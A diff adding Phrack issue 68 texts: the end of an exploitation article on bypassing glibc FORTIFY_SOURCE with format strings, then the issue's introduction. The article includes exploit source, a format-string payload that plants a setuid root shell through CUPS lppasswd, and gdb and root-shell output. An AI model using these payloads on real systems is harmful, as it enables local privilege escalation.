+    /* Fill in the types of all the arguments.  */
+    for (cnt = 0; cnt < nspecs; ++cnt)
+      {
+      /* If the width is determined by an argument this is an int.  */
+      if (specs[cnt].width_arg != -1)
+        args_type[specs[cnt].width_arg] = PA_INT;
+
+enum
+{                               /* C type: */
+  PA_INT,                       /* int */
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+Quick summary of the code:
+args_type[ ATTACKER_OFFSET ] = 0x00000000;
+
+Explanation:
+The above code is required to process width arguments that are passed in as
+parameters.
+
+For example:
+
+        %1$*269096872$x
+
+Effectively does:
+        //specs[cnt].width_arg = 269096872
+        args_type[specs[cnt].width_arg] = 0
+
+..which, if your stack is set up just right, can toggle off that 
+_IO_FLAGS2_FORTIFY bit in the `stdout` FILE structure.
+
+Remember that :args_type: was one of the buffers allocated on the stack in
+the alloca snippet above in 1-C and is an array of an integer base type.
+
+Care must be taken as the alloca becomes a bit of a problem when nargs gets
+set to a large value. This will likely shift the stack to somewhere 
+unmapped. The next push or call instructions would result in a crash, 
+preventing proper exploitation.
+
+So the key constraints around :nargs: are as follows:
+
+1) the stack must be shifted somewhere sane
+2) the memset operation must not hit an unmapped page.
+
+The easiest way to meet these two contraints is to use an integer overflow.
+Since no bounds checking occurs on :nargs:, you can artificially keep the
+stack in-place with this: `%1073741824$`. No specifier is really required 
+and you can end it with just a $ sign. The second contraint is also 
+satisfied because the memset will be called with a length parameter of 0.
+
+The details of the allocas are a little bit more complex if you look at the
+assembly. For our purposes, they roughly end up doing:
+
+esp -= nargs * (4)
+esp -= nargs * (12)
+esp -= nargs * (4)
+
+The 1073471824*4 happens to be 0 when truncated into a 32-bit integer. This
+and other factors of 1073471824 prove to be sufficient for side-stepping 
+the alloca constraints.
+
+This concludes the arbitrary 4-byte NUL overwrite.
+>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
+
+
+The first patch (1-B) can be disabled by clearing that IO_FLAGS2_FORTIFY 
+bit in the file stream pointer. Typically it will be the only flag enabled 
+on the file stream pointer. In the unlikeley case that one of the other 
+bits was set, for example _IO_FLAGS2_MMAP, inconsitencies may arise when 
+the file stream pointer is closed. This may or may not affect 
+exploitability.
+
+We will now revisit the second part of the patch. It makes any format 
+string exploit less flexible. The loop on nargs has to be terminated early 
+to avoid the assert and the libc_fatal when a "hole" in the arguments is 
+discovered. By hole, I am referring to the code in (1-C) which checks the 
+:args_type: value against -1. Remember that the fortify source patch won't 
+let you access %5$x without also accessing %1$? %2$? %3$? and %4?. That is 
+what is meant by 'hole' in this context.
+
+The termination of that loop can coincidentally happen all by itself if the
+stack is aligned correctly. The loop will hit out of bounds of the alloca 
+created buffers and self terminate when :nargs: is set to 0, provided that
+:nargs: is stored by the compiler on the stack. If it fails to do this, an 
+assert() statemet will be triggered, preventing exploitation.
+
+Or, we can reuse the 4-byte NUL write can be used to bypass the loop 
+reliably.
+
+One instance of a successful bypass can then be performed in two easy 
+steps.
+
+ 1. Turn off the IO_FORTIFY_SOURCE bit to allow %n from a writeable address
+ 2. Set nargs=0 to skip the value-filling loop.
+
+Note that bypassing the loop via #2 requires us to dig further down the 
+stack to find our user input since the same loop is responsible for filling
+in the args_value array. If you have ever attempted to exploit a format
+string by truncating a pointer and reusing it as destination on glibc, you 
+probably failed because of that args_value array.
+
+------[ 3. Exploitation
+
+In standard phrack style we will first do this on a test binary and then on
+a real-world binary to disprove any accusations of academic tendencies, 
+like thought experiments. Feel free to skip to part B.
+
+------------[ A. Dummy Test Program for clarity
+
+Note: ASLR is disabled and the program has an executable stack.
+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+//File: test.c
+//gcc -D_FORTIFY_SOURCE=2 -O2
+int main(){
+  char buf[256];
+  fgets(buf, sizeof(buf), stdin);
+  printf(buf);
+}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+captain@planet:~/research/fmt/article$ ./a.out
+%n
+*** %n in writable segment detected ***
+Aborted
+captain@planet:~/research/fmt/article$ ./a.out
+%4$x
+*** invalid %N$ use detected ***
+Aborted
+
+Oh nooO! Scary format string protections are making everything hurt.
+
+ENABLE POWER MORPHING LINUX SHARING COMMUNITY POWER
+----
+Alright remember the process kids.
+1. Disable fortify source
+2. Set nargs = 0
+3. Enjoy the %n
+
+So first, lets figure out where that arbitrary 4-byte NUL write is on our
+system. We will pick some ridiculous desination, like %1$*269168516$. If it
+doesn't crash, keep incrementing that by about 20000.
+
+So we'll send the following as our investigative payload. The first part
+should trigger the NUL write. The second part should keep the stack sane.
+
+%1$*269168516$x %1073741824$
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+captain@planet:~/research/fmt/article$ gdb -q ./a.out
+Reading symbols from /home/captain/research/fmt/article/a.out...(no
+debugging symbols found)...done.
+(gdb) r
+Starting program: /home/captain/research/fmt/article/a.out
+%1$*269168516$x %1073741824$
+
+Program received signal SIGSEGV, Segmentation fault.
+0x001888f1 in _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
+"%1$*269168516$x %1073741824$\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:1735
+1735  vfprintf.c: No such file or directory.
+  in vfprintf.c
+(gdb) x/i $pc
+=> 0x1888f1 <_IO_vfprintf_internal+11489>:  movl   $0x0,(%ecx,%eax,4)
+(gdb)
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+The fortify source bit will be somewhere inside of the file stream pointer
+over at s=0x29f4e0.
+
+    stdout->_flags2 |= _IO_FLAGS2_FORTIFY;
+
+On this target machine, it happens to be @+60
+
+0x29f51c <_IO_2_1_stdout_+60>:  0x00000004
+
+Since the operations here are relative, ASLR is not too big of an issue and
+once you find your offset, it's pretty consistent (YMMV).
+
+Here is the equation
+$ecx + $eax*4  should = 0x29f51c
+
+(gdb) p/d ((0x10029f51c-$ecx) & 0xffffffff)/4
+$11 = 269145003
+
+Counting starts from 0, so add 1 to that for the payload.
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+captain@planet:~/research/fmt/article$ gdb -q ./a.out
+Reading symbols from /home/captain/research/fmt/article/a.out...(no
+debugging symbols found)...done.
+(gdb) break vfprintf
+Function "vfprintf" not defined.
+Make breakpoint pending on future shared library load? (y or [n]) y
+Breakpoint 1 (vfprintf) pending.
+(gdb) r
+Starting program: /home/captain/research/fmt/article/a.out
+%1$*269145004$x %1073741824$
+
+Breakpoint 1, _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
+"%1$*269145004$x %1073741824$\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:210
+210  vfprintf.c: No such file or directory.
+  in vfprintf.c
+(gdb) tbreak *(vfprintf+11489)
+Temporary breakpoint 2 at 0x1888f1: file vfprintf.c, line 1735.
+(gdb) c
+Continuing.
+
+Temporary breakpoint 2, 0x001888f1 in _IO_vfprintf_internal (s=0x29f4e0,
+format=0xbffeb2dc "%1$*269145004$x %1073741824$\n", ap=0xbffeb2c8 "@\364)")
+    at vfprintf.c:1735
+1735  in vfprintf.c
+(gdb) x/i $pc
+=> 0x1888f1 <_IO_vfprintf_internal+11489>:  movl   $0x0,(%ecx,%eax,4)
+(gdb) x/wx $ecx+$eax*4
+0x29f51c <_IO_2_1_stdout_+60>:  0x00000004
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+This operation has to be repeated for :nargs:. The easiest way to locate
+:nargs: is to pick a value you know (0xdeadbeef), and find it on the stack 
+or just pick it up where it gets loaded before the alloca code.
+
+%1$*3735928559$x
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+Program received signal SIGSEGV, Segmentation fault.
+0x0018880f in _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
+"%1$*3735928559$x\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:1721
+1721  vfprintf.c: No such file or directory.
+  in vfprintf.c
+(gdb) x/wx $ebp-0x4bc
+0xbffeadcc:  0xdeadbeef
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+p/d (0xbffeadcc-$ecx)/4+1
+= 472 for me
+
+Disabling both :nargs: and fortify source : [%*472$ %1$*269145004$
+%1073741824$]
+
+Well, that's not actually true. It depends on what your buffer looks like.
+For example if you attempt to do:
+
+%49150u %4847$hn %*472$ %1$*269145004$ %1073741824$
+
+The first two parameters will cause the stack to shift and the values have 
+to be recalculated based on the size of that $hn offset. This gets a bit 
+hairy, but with some grunt work you'll be done. The next task is finding
+a good way to hijack flow control.
+
+One good vector happens to be a call to free shortly after the %n write.
+
+=> 0xb7d4f3f8 <_IO_vfprintf_internal+2024>:  mov    -0x4bc(%ebp),%edi
+=> 0xb7d4f3fe <_IO_vfprintf_internal+2030>:  mov    %edi,(%esp)
+=> 0xb7d4f401 <_IO_vfprintf_internal+2033>:  call   0xb7d28988 <free@plt>
+=> 0xb7d28988 <free@plt>:  jmp    *0x24(%ebx)
+(gdb) x/wx $ebx+0x24
+0x29f018:  0x001b8e60
+
+We will overwrite the upper 16-bits to point into the stack
+(0x001b->0xbfff).
+Write Dest: 0x29f01a
+
+One way to smuggle this value is using a command line argument.
+
+%49150u %4847$hn %*13996$ %1$*269158528$ %1073741824$
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+Program received signal SIGSEGV, Segmentation fault.
+0x0018880f in _IO_vfprintf_internal (s=0x29f4e0, format=0xbffeb2dc
+"%1$*3735928559$x\n", ap=0xbffeb2c8 "@\364)") at vfprintf.c:1721
+1721  vfprintf.c: No such file or directory.
+  in vfprintf.c
+(gdb) x/wx $ebp-0x4bc
+0xbffeadcc:  0xdeadbeef
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+So after some fenagling you'll reach something like this:
+
+A great improvement would be automation via instrumentation or mapping
+out the stack shifting very tightly.
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+captain@planet:~/research/fmt/article$ export PAY=`python -c 'print
+"\xcc"*4096*20'`
+captain@planet:~/research/fmt/article$ (python -c 'print "%49150u %4847$hn
+%1$*269168516$x %1$*13996$x %1073741824$"')
+                                      | ./a.out `echo -ne "a ccc ddbbb
+\x1a\xf0\x29 fffff"`
+...
+            Trace/breakpoint trap (core dumped)
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+
+------------[ B. The real world exploit
+
+===========================================================================
+===========================================================================
+===========================================================================
+
+CUPS locale() vulnerability.
+
+Ronald Volgers noticed that lppasswd used user-specified locales. A few
+distributions (debian, ubuntu, fedora?) ship lppasswd setuid root. Is this
+awesome? yes
+
+ls -al lppasswd
+-rwsr-xr-x 1 root root 19144 2010-07-07 00:56 lppasswd
+
+To exploit it, you just export LOCALEDIR to a place where 
+$LOCALEDIR/C/cups_C.po holds the format strings for the various printfs in 
+lppasswd.
+
+This exploit turns out to be hard for a few reasons. The first, it is non
+interactive. That is, the format string can not be used for an info leak to
+bypass ASLR. The second limitation is that lppasswd creates a LOCK file, so
+any weaponized exploit must be highly reliable. Luckily this second one can
+be bypassed with resource limits.
+
+File: sploit_filz.c
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+#include <sys/resource.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <sys/time.h>
+
+int main(int argc, char *argv[])
+{
+  struct rlimit rara;
+  int keke[4096*4];
+  char test[0x10000];
+  char *args[] = { "./lppasswd", 0 };
+  char *env[] = { "LOCALEDIR=./", &keke, test, 0};
+  int riri;
+  int jmp = 0xbffdc66c;
+
+  memset(test, 0x01, sizeof(test));
+  test[0x10000-1] = 0x00;
+
+  for(riri = 0; riri < sizeof(keke)/sizeof(int); riri+=4){
+    keke[riri+0] = jmp+2;
+    keke[riri+1] = jmp+2;
+    keke[riri+2] = jmp;
+    keke[riri+3] = jmp;
+  }
+
+  rara.rlim_max = rara.rlim_cur = atoi(argv[1]);
+  setrlimit(RLIMIT_NOFILE, &rara);
+
+  execve("./lppasswd",args,env);
+}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+There is also one important difference between the test program and 
+lppasswd. The vulnerability inside libcups is triggered by vsnprintf. 
+Internally, vsnprintf creates a fake file stream pointer on the stack and 
+then passes it to vfprintf.
+
+This is actually pretty good news in terms of bypassing ASLR as the file
+stream pointer is a fixed offset from the format string structures, which 
+glibc allocates on the stack.
+
+The vulnerable function in libcups follows.
+
+File: cups/cups/langprintf.c
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+int          /* O - Number of bytes written */
+_cupsLangPrintf(FILE        *fp,  /* I - File to write to */
+          const char  *message,  /* I - Message string to use */
+          ...)      /* I - Additional arguments as needed */
+{
+
+...
+
+  va_start(ap, message);
+  vsnprintf(buffer, sizeof(buffer),
+            _cupsLangString(cg->lang_default, message), ap);
+  va_end(ap);
+..
+}
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+With ASLR disabled, the best option is to go after the return address. In 
+the callstack for vfprintf:
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+Breakpoint 1, _IO_vfprintf_internal (s=0xbffdc68c,
+    format=0x1187a0 "chown root:root /tmp/sh; chmod 4755 /tmp/sh; %49150u
+%7352$hx %49150u %7353$hx %14263u %7352$hn %27249u %7353$hn %1$*14951$x
+%1$*14620$x %1073741824$", ap=0xbffdefe8 "\243>\344\267-\021\021") at
+vfprintf.c:210
+210  in vfprintf.c
+(gdb) bt
+#0  _IO_vfprintf_internal (s=0xbffdc68c,
+    format=0x1187a0 "chown root:root /tmp/sh; chmod 4755 /tmp/sh; ...
+#1  0xb7df2bf4 in ___vsnprintf_chk (s=0xbffde7bc "", maxlen=2048, flags=1,
+    slen=2048,
+    format=0x1187a0 "chown root:root /tmp/sh; chmod 4755 /tmp/sh; ....
+#2  0xb7f96544 in vsnprintf (fp=0xb7e68580,
+    message=0x1117c5 "lppasswd: Unable to open password file: %s\n")
+    at /usr/include/bits/stdio2.h:78
+#3  _cupsLangPrintf (fp=0xb7e68580,
+    message=0x1117c5 "lppasswd: Unable to open password file: %s\n")
+    at langprintf.c:125
+#4  0x0011116a in main (argc=1, argv=0xbffdfee4) at lppasswd.c:316
+(gdb)
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+The second return address lends itself very well to exploitation. The 2nd
+parameter points to user input. This is highly useful when overwriting the 
+saved return address.
+The address can be pointed to &system or __libc_system or do_system, and 
+the old 2nd argument will become the argument to system.
+
+Above in the resource limit setting code, the enivornment is filled with
+pointers to that return address::  int jmp = 0xbffdc66c;
+
+    keke[riri+0] = jmp+2;
+    keke[riri+1] = jmp+2;
+    keke[riri+2] = jmp;
+    keke[riri+3] = jmp;
+
+NX Bypass: C/cups_C.po
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+msgid "lppasswd: Unable to open password file: %s\n"
+msgstr "chown root:root /tmp/sh; chmod 4755 /tmp/sh; %49150u %7352$hx
+%49150u \
+%7353$hx %14263u %7352$hn %27249u %7353$hn %1$*14951$x %1$*14620$x
+%1073741824$"
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+The first part executes a command. The next 4 arguments were padding but
+removing them would have required some recalculations.
+
+These two writes redirect control flow to system by overwriting the least
+and most significant half-words of the saved return address.
+
+%14263u %7352$hn %27249u %7353$hn
+
+And the last part is used to bypass FORTIFY_SOURCE:  
+%1$*14951$x %1$*14620$x %1073741824$.
+
+Overall, things are pretty hairy, but they work with some massaging.
+
+captain@planet:~/research/fmt/cups-1.4.2/systemv$ ls -l lppasswd
+-rwsr-xr-x 1 root root 18867 2010-06-06 01:26 lppasswd
+captain@planet:~/research/fmt/cups-1.4.2/systemv$ ls -al /tmp/sh
+ls: cannot access /tmp/sh: No such file or directory
+captain@planet:~/research/fmt/cups-1.4.2/systemv$ cp /bin/bash /tmp/sh
+captain@planet:~/research/fmt/cups-1.4.2/systemv$ gcc -o sf sploit_filz.c
+sploit_filz.c: In function ?main?:
+sploit_filz.c:13: warning: initialization from incompatible pointer type
+sploit_filz.c:20: warning: incompatible implicit declaration of built-in
+function ?memset?
+captain@planet:~/research/fmt/cups-1.4.2/systemv$ ./sf 4
+Enter old password:
+Enter password:
+Enter password again:
+sh: %49150u: not found
+Segmentation fault
+captain@planet:~/research/fmt/cups-1.4.2/systemv$ ls -al /tmp/sh
+-rwsr-xr-x 1 root root 818232 2010-07-07 01:26 /tmp/sh
+captain@planet:~/research/fmt/cups-1.4.2/systemv$ /tmp/sh -p
+sh-4.1# id
+uid=1337(captain) gid=1337(captain) euid=0(root)
+groups=4(adm),20(dialout),24(cdrom),29(audio),30(dip),44(video),46(plugdev)
+,104(lpadmin),112(netdev),115(admin),118(pulse-access),120(sambashare),
+1000(captain)
+
+
+------------[ C. TODO- ASLR
+
+The author has failed to make an ultra reliable exploit for defeating both
+ALSR and an NX stack. Part of what makes it difficult is all of the moving
+parts.
+
+In this case ASLR makes things hairy for two reasons. Both the stack and 
+libc (and the text) are shifting. They are randomly offset from each other.
+In the above exploit, two values need to be known. The first is the 
+location of the saved return address. The second is the address of glibc. 
+By applying the resource limits, it is still possible to brute force this 
+vulnerability, but it requires patience with 24-bits of entropy.
+
+Anyway, the following two methods have been attempted.
+
+1) Copy (read+write) primitive using width arguments.
+
+The width argument can be used to read a value from memory and write it
+somewhere.
+
+%1$*100$u will read the 100th argument's value, and write that many spaces.
+This is presumably the reason why %n was introduced in the first place. The
+copy would look like this:
+
+%1$*100$u %2$101$n
+
+Author's Verdict: Too hairy
+The copy write primitive does not seem to work reliably under the fortify
+source loss of state. Exact reasons have not been yet determined, and a way
+to stabilize them may exist. In addition, once a copy operation is 
+performed, the internal printf counter must be reset by writing a value 
+numerous times. The easiest way to do this would be to print out the same 
+value '256' times and reduce write width to one-character at a time. 
+Writing the same value '256' times ensures that the lowest byte of the 
+internal counter will be 0.
+
+2) Repurpose double stack pointers
+
+For lppasswd, stack double-pointers exist that can be repurposed. For %n to
+work, a pointer is needed. The idea behind this avenue is to use the first 
+pointer to redirect the second pointer to the return address.
+
+Author's verdict: Using the pointers is reliable, but ASLR has enough 
+entropy in the the correct offset to the return address is unreliable. The 
+best acheivement was 24-bits of entropy, 12-bits for the return address and
+12-bits for &system. Only one exploit seemed to work, and the author was 
+unable to reproduce even after a night of testing.
+
+===========================================================================
+
+------[ 4. Afterword
+
+It is the author's opinion that it is quite amazing vfprintf even compiles
+in the first place. Briefly, it should be noted that there are more angles 
+of attack in the vfprintf code that are a bit more complicated. Although 
+quite messy. Here is one example, if a target is using the deprecated 
+features of vfprintf to register their own format string specifiers, an 
+attacker can get arbitrary code execution without needing %n. Execution 
+without %n may even be possible with the jump table implementations...
+
+This article is dedicated to runixd and beist, the top scoring two of the
+first three loller skaterz. Mad greetz to the even better lollerskaterz 
+dropping from rofl copters. Surf the chaos dudes!
+
+Many thanks to the phrack staff for their help.
+And also real hackers who make me blush.
+
+Thanks for reading. Have phun!
+
+[0] http://msdn.microsoft.com/en-us/library/ms175782.aspx
+[1] http://www.securityfocus.com/bid/1634
+[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0393
+[3] http://www.phrack.org/issues.html?issue=59&id=7&mode=txt
+[4] http://www.phrack.org/issues.html?issue=63&id=14
+[5] http://althing.cs.dartmouth.edu/local/formats-teso.html
+[6] http://www.loko.nu/formatstring/format_string.htm
diff --git a/phrack68/1.txt b/phrack68/1.txt
new file mode 100644
index 0000000..2603825
--- /dev/null
+++ b/phrack68/1.txt
@@ -0,0 +1,344 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x01 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[ Introduction ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------------=[ by the Phrack staff ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[  April 14, 2012  ]=-------------------------=|
+|=-----------------------------------------------------------------------=|
+
+
+              "C is quirky, flawed, and an enormous success."
+                                   -- Dennis Ritchie
+
+October 2011, a legend has fallen...
+
+                         _____.______.______._____
+                         \`\                   /'/
+                          \ |                 | /
+                           >|___,____,____,___|<
+                          /d$$$P ,ssssssssssss. \
+                         /d$$$P ,d$$$$$$$$$$$$$b \
+                        <=====w======w======w=====>
+                         \ \____> \_____/ <____/ /
+                          \_____________________/ pb
+
+
+Dennis Ritchie, proud father of nothing less than our beloved C language
+and UNIX operating system, is gone. While the world has been crying over
+the loss of Steve Jobs, little has been written about Dennis' death. Saying
+that his inventions influenced the hacking community in a way even he
+probably never knew is _not_ an exaggeration. Think about it: how many of
+us became hackers because we discovered C, related bugs or UNIX?
+
+Dennis, the world might not be aware of your unbelievable contribution but
+we are. Farewell dear friend, may you rest in peace.
+
+                                        -- anonymous bug hunter
+
+
+                        -----( Dark Thoughts )-----
+
+Today I woke up thinking about the death of this Chinese little girl [1]. I
+felt bad. It's true that watching the youtube video was disturbing but
+something kept hitting my mind. What if the incident had occurred in my
+country?  Would people really have behaved any differently? I have doubts.
+Just because a video leaked on the Internet people conveniently blamed
+China, a country both controverted and feared.
+
+What if the modern society in general was tending to slowly become amoral
+and cold? A proof is that we all watched this video fully aware of its
+content. Vicious, aren't we? But not only that. We're also fucking cowards.
+Suddenly discovering that there is a darkness hidden inside the very roots
+of our society is dramatic. But pretending to ignore the fact that there
+are countries in this world where atrocious massacres are part of the daily
+life seems fine.
+
+It was written in the US Declaration of Independence that "We hold these
+truths to be self-evident, that all men are created equal [...]". How could
+that possibly be true? This morning I was at home, healthy, comfortably
+sitting in front of my computer screen, with a cup of coffee in hand. A few
+minutes later, I was working (or luxuriously pretending to be) to earn
+money that I spent in the bar that night with my friends. In the mean time,
+not so far away, people were killed, raped, mutilated. The truth is that I
+don't even care when I think about it. This morning I was pretending being
+concerned for other people, but tonight I don't give a shit anymore.
+
+Something must be wrong.
+
+                                    -- anonymous coward / Phrack
+
+
+[1] http://www.chinapost.com.tw/china/national-news/2011/10/21/320549/
+    Chinese-girl.htm
+
+
+                      -----( Phrack Issue #68 )-----
+
+Hello Phrackers! How are you guys doing? We hope well. We hope your latest
+exploit works reliably (again) and all your bounces are alive and pinging.
+We also hope you and your friends still are out of prison, or recently came
+out (wink wink). Us, we're doing good. Looks like we did it again and a new
+release is here. Ya-hoo.
+
+This release brings you an amazing selection of hacking goodies. We have
+two papers on applied cryptanalysis by greg and SysK, an area in which we
+hope to see more submissions for the next issues. We are also thrilled
+about the return of the Art of Exploitation section. And what a return; we
+have for you not one, but two detailed papers demonstrating that
+exploitation is indeed an art form. Speaking of exploitation, did you ever
+wonder what Firefox, FreeBSD and NetBSD have in common? Read the paper by
+argp & huku and find out. Are you hacking Windows' farms? Be sure to check
+the p1ckp0ck3t's novel approach of stealing Active Directory password
+hashes. Perhaps you prefer malware analysis and identification of malware
+families; Pouik and G0rfi3ld have written a paper with a focus on Android
+malware that will satisfy you. Android is quickly becoming the standard
+mobile platform. I think it's time for an Android/ARM kernel rootkit. Start
+from dong-hoon you's paper and hack your own. styx^ continues the kernel
+fun with a paper that updates truff's LKM infection techniques to 2.6.x and
+3.x Linux kernels. If for whatever reason you're afraid of messing with
+your kernels, Crossbower shows you how to create a stealthy userland
+backdoor without creating new processes or threads.
+
+We also believe that you will find merit with the two main non technical
+papers of this issue. Both address more or less the same topics, but from
+two totally different points of view. On one hand, we have an analysis of
+how the happiness that hacking brings to all of us can and is corrupted by
+the security industry. One the other, a call to all hackers to take a side
+between staying true to the spirit of hacking and selling out to the
+military intelligence industrial complex. Read them, think about them and
+take a side. Remember, "The hottest places in hell are reserved for those
+who in times of great moral crisis maintain their neutrality".
+
+Phrack World News is also making a comeback, courtesy of TCLH. In
+International Scenes we explore Korea and the past of the Greek scene.
+Loopback has increased and we decided to resurrect Linenoise as we had some
+tiny but not less interesting submissions. While being eligible for an
+issue remains hard, submitting for Linenoise may be an easier way for
+people to share tricks in the next issues.
+
+We are proud to have FX prophiled in this epic issue. As an added gift, FX
+wrote a eulogy for PH-Neutral, at least in its original form. PH-Neutral,
+as all great hacker creations, lives on as long as the hackers behind it
+are fueling it with their passion.
+
+Speaking of hacker passion, this issue re-establishes a long lost
+connection. Phrack and SummerCon are again bonded on the 25th anniversary
+of SummerCon! Shmeck and redpantz, representing SummerCon, contribute two
+papers; a history of the conference from its beginning in 1987 to this
+year, and of course one of the Art of Exploitation papers.
+
+Believe it or not it was _fucking_ hard to prepare this issue. It's no news
+that the mentality of the hacking community has changed, but this time we
+had to face multiple deceptions. It's not the first time, however the 
+quantity makes this event scary. It demonstrates how rotten and corrupted 
+the so-called spirit of some people pretending to be part of the 
+underground has become.
+
+There's a time when you realize that you've lost count of the battles you
+lost, but you still kinda won enough to keep faith. More importantly, you
+realize that you still care. Granted, it's not the deep, mystical and life
+changing moment that movies display -- the huge pile of shit you pushed out
+of the door just before getting to sleep is still there. It maybe just
+stinks a little less.
+
+But we care, hell, we really care about Phrack and what it means. It costs
+time and frustration, many battles lost, it faces the two-point-oh
+revolution (lots of quality stuff goes into blogs, for immediate
+consumption) and the money drop by the security industry, but the
+satisfaction of seeing it out again is huge. Yes, we care.
+
+And that's not just because we're a bunch of old farts that stay attached
+to the past. We care because it's a constant, maybe feeble but constant,
+heartbeat of that world, that community that we grew up and now live in.
+You know, that little thing called 'the Underground' that we are proud and
+honored to somehow, in part, represent.
+
+We've heard from many corners that 'the Underground' is dead. We'd love to
+hear those people describe what the Underground is, then. Sure, things
+change, evolve. Laws, computing power, money invested, political links,
+technology, every piece moves fast and reshapes the landscape. But if
+you're reading these lines today, if you've just finished a 36-hour
+coding, hacking marathon, you're keeping it alive.
+
+So thank you, for that. Thank you to the authors for finding the time of
+sharing their knowledge. Thank you to anyone that setups a new connection.
+Thank you to whomever fights for information and freedom. Thanks crews.
+
+Happy hacking, Phrackers.
+You guys are the BEST heartbeat in the world.
+
+
+                                    -- the Phrack staff
+
+
+ ______  _     _ ______          ______ _    _      __  _      __   _____
+(_____ \| |   | (_____ \   /\   / _____) |  / )   _|  || |_   / /  / ___ \
+ _____) ) |__ | |_____) ) /  \ | /     | | / /   (_   ||  _) / /_ ( (   ) )
+|  ____/|  __)| (_____ ( / /\ \| |     | |< <     _|  || |_ / __ \ > > < <
+| |     | |   | |     | | |__| | \_____| | \ \   (_   ||  _| (__) | (___) )
+|_|     |_|   |_|     |_|______|\______)_|  \_)    |__||_|  \____/ \_____/
+
+
+                 - By the community, for the community. -
+
+
+$ cat p68/index.txt
+
+<--------------------------( Table of Contents )-------------------------->
+
+ 0x01  Introduction ...................................... Phrack Staff
+
+ 0x02  Phrack Prophile on FX ............................. Phrack Staff
+
+ 0x03  Phrack World News ................................. TCLH
+
+ 0x04  Linenoise ......................................... various
+
+ 0x05  Loopback .......................................... Phrack Staff
+
+ 0x06  Android Linux Kernel Rootkit ...................... dong-hoon you
+
+ 0x07  Happy Hacking ..................................... Anonymous
+
+ 0x08  Practical cracking of white-box implementations ... SysK
+
+ 0x09  Single Process Parasite ........................... Crossbower
+
+ 0x0a  Pseudomonarchia jemallocum ........................ argp & huku
+
+ 0x0b  Infecting loadable kernel modules ................. styx^
+
+ 0x0c  The Art of Exploitation:
+       MS IIS 7.5 Remote Heap Overflow ................... redpantz
+
+ 0x0d  The Art of Exploitation:
+       Exploiting VLC, a jemalloc case study ............. huku & argp
+
+ 0x0e  Secure Function Evaluation vs. Deniability in OTR
+       and similar protocols ............................. greg
+
+ 0x0f  Similarities for Fun and Profit ................... Pouik & G0rfi3ld
+
+ 0x10  Lines in the Sand: Which Side Are You On in the
+       Hacker Class War .................................. Anonymous
+
+ 0x11  Abusing Netlogon to steal an Active Directory's
+       secrets ........................................... the p1ckp0ck3t
+ 
+ 0x12  25 Years of SummerCon ............................. Shmeck
+
+ 0x13  International Scenes .............................. various
+
+<------------------------------------------------------------------------->
+
+
+                    -----( GreetZ for issue #68 )-----
+
+    - FX:                            epicness personified
+    - herm1t:                        you have our support
+    - TCLH:                          for everything
+    - x82:                           deepest apologies for the 1 year wait
+    - anonymous authors:             best part of this issue
+    - sysk:                          keep submitting man!
+    - redpantz & Shmeck:             Phrack and SummerCon bonded again
+    - greg:                          schooling Alice and Bob
+    - Crossbower:                    parasite zoologist
+    - the p1ckp0ck3t:                be wary or he will get your hashes
+    - huku & argp:                   the scourge of memory allocators
+    - styx^:                         yes we are hardcore reviewers
+    - Pouik & G0rfi3ld:              who the hell is G0rfi3ld??? ;>
